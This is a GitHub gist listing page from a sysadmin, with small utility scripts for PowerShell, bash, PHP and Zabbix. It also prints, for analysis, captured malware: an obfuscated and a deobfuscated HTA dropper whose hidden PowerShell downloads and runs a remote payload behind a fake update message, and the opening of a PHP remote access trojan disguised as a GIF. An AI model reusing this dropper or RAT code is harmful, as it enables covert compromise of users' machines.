I hereby claim:
- I am jwieder on github.
- I am joshwieder (https://keybase.io/joshwieder) on keybase.
- I have a public key ASACwy7VbhSGEFSeRBXCx0l6kUrHziwC5AuLSEe4U6dWewo
To claim this, I am signing this object:
Josh Wieder jwieder
jwieder
/ empty-folderScan.ps1
Created
February 20, 2016 18:23
Powershell script to identify all empty folders in C partition. Replace C:\ with the path of your choice
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $a = Get-ChildItem C:\ -recurse | Where-Object {$_.PSIsContainer -eq $True} | |
| $a | Where-Object {$_.GetFiles().Count -eq 0} | Select-Object FullName |
jwieder
/ finderMover.sh
Created
February 24, 2016 17:25
Finds files of a given extension in a directory and moves them into another directory. Combine with cron to - for example - move log files to a network share for long term storage. Follows symlinks. Adjust maxdepth to increase or decrease recursion. Simple & effective!
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| Source="/var/log" | |
| Destination="/to/your/backups" | |
| find -L $Source -maxdepth 3 -type f -name "*.gz" -exec mv {} $Destination \; |
jwieder
/ GetBundles.php
Created
July 19, 2016 23:08
A simple PHP script that allows users that allows WHMCS users to retrieve Product Bundle details including Display Price, Description, et al. Responses output is JSON encoded. Tested in WHMCS v6.3.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // HTTP USAGE: | |
| // http://example.com/GetBundles.php?bid= | |
| // BASH CLI EXAMPLE USAGE: | |
| // export QUERY_STRING="bid=2" ; php -e -r 'parse_str($_SERVER["QUERY_STRING"], $_GET); include "GetBundles.php";' | |
| $db_host = "mysql.databasehost.ext"; | |
| $db_name = "mysqlDatabaseName"; | |
| $db_user = "MysqlUsername"; |
jwieder
/ chrome_patch-obfuscated.hta
Created
July 30, 2016 15:42
obfuscated version of a malicious script used to force victims to download a separate payload file 524.dat
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script>var jjxqu='tqrfyb u{d gmoogvdexTiot(q-b1d0i0o,v-s1m0g0w)l;srceksuiezwetTbom(y0c,h0b)j;w ian=tnqehwj rAkcstgifvlesXmOhbejfekcotz(o\'kWssqcxrritpets.dSbhaeqlulr\'x)e;i iaw.pRouhni(b"pPmogwaebrfSphleylflj p-zWoihnddpoiwtSjtzyrlnei zHkiydodsehnp i$tdv=i$veanxvh:ytdeqmnpd+f\'v\g\u4eaa2e9e2r4s8n0r8';var qwis='dfl6f6v9s8v5edmeq3mah9qakdo1pen3fdd7r4k3zex0fde.xejxiep\'c;v(hNfehwm-bOabijfencytr vSpycsktfepmp.iNheati.eWfembbCplvirernrty)x.zDloywzntldomardvFhihlxer(m\'n hhvtuthpdsy:n/q/acchliseuwdgqarmcobnpicavcs.ponrogx/u1l7p/g5z2w4c.tdeafts\'r,w$tdt)i;lSotlabrfto-dPurqoycnegslsb d$gdn;s[nSm';var ywjtfy='ypsptfetmv.xRkerfqleezcctsilodnx.aAhsssrefmfbxlryh]a:x:uLsokagdhWaimtbhvPjamrmtaiqamldNjaymgeh(y\'oSayqsttfenml.nWnijnhdgotwnso.tFzoqrpmjsc\'b)k;s[osnycsntuekml.iwkibncdpopwnsc.dfxokrjmqsy.ymkeysoszahgqebbsojxq]g:m:dsbhwopwk(g\'rUmpwdgaatzej ycjotmopilseztgeh.z\'o,x\'bIhnhfronrtmvapt';var mzqyqx='qikoznx\'c,m[tWjinntdsolwdsm.aFloframrsm.aMfejsbsmargteaBlooxpBbuztptyobncss]k:p:lOdKb,o q[cSayvsctrehmc.xWrienkdioxw |
jwieder
/ chrome_patch-DEobfuscated.hta
Last active
July 30, 2016 16:02
DEobfuscated version of a malicious script used to force victims to download a separate payload file 524.dat
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| try { | |
| moveTo(-100, -100); | |
| resizeTo(0, 0); | |
| a = new ActiveXObject('Wscript.Shell'); | |
| a.Run("PowerShell -WindowStyle Hidden $d=$env:temp+'g2924808f66985de3a9ad1e3d743e0d.exe';(New-Object System.Net.WebClient).DownloadFile(' https://website.ext/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information);", 0, false); | |
| var b = new ActiveXObject('Scripting.FileSystemObject'); | |
| var p = document.location.href; | |
| p = unescape(p.substr(8)); | |
| if (b.FileExists(p)) b.DeleteFile(p); | |
| } catch (e) {} |
jwieder
/ stateNameCoversion.php
Created
September 19, 2016 17:23
PHP script to convert a text file of two letter state abbreviations into full text names. You can replace the $us_state_abbrev array with just about any one-dimensional array to convert whatever you want (countries, etc). You can also easily change this so that full state names are converted to two-state codes.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /* | |
| * Replace list.txt with the name of your file. The file should only include a list of two-letter state abbreviations, one on each line. | |
| * Results printed to STDIO, so use pipes to dump to a file if you want to save the results or add a function to do the same thing (I was | |
| * using this for CLI use which is why a function isnt in here already) | |
| * | |
| * Josh Wieder | |
| * https://consulting.joshwieder.net | |
| */ |
jwieder
/ gif-embedded-RAT-v1425.php
Created
April 15, 2017 14:14
This is the source code for a RAT I found. The RAT was rot-13 encoded, and contained a standard six byte .GIF header. The idea being to upload the file as an attachment for a form or other program that allows such foolishness. I found the revision number interesting.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * REVISION: $Rev: 1426 $ | |
| */ | |
| if (md5(md5($_REQUEST['hhh'])) == 'bc5aaff98e1783e8e30f266af63cea42') { | |
| set_time_limit(36000); | |
| function unslash_rec(&$arr) | |
| { | |
| reset($arr); | |
| while (list($key) = each($arr)) |
jwieder
/ Simple-Typing-Carousel-.markdown
Created
April 28, 2017 21:39
— forked from gschier/Simple-Typing-Carousel-.markdown
A Pen by Gregory Schier.
Simple pure JavaScript plugin to rotate text snippets as if they were being typed.
A Pen by Gregory Schier on CodePen.
jwieder
/ fpingperm.sh
Created
April 29, 2017 17:12
A simple shell script that will restore the permissions to fping & fping6 required by Zabbix following an update or other system change. I use this as part of a daily cron. NOTE: this is designed for RHEL/CentOS, and assumes that you are running Zabbix from a group named "zabbix".
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| x=0 | |
| y=0 | |
| if [ -e /usr/sbin/fping ] | |
| then | |
| if [ `stat -c %a:%G /usr/sbin/fping` == "6710:zabbix" ] | |
| then | |
| echo "Sticky bit assigned and owner set" |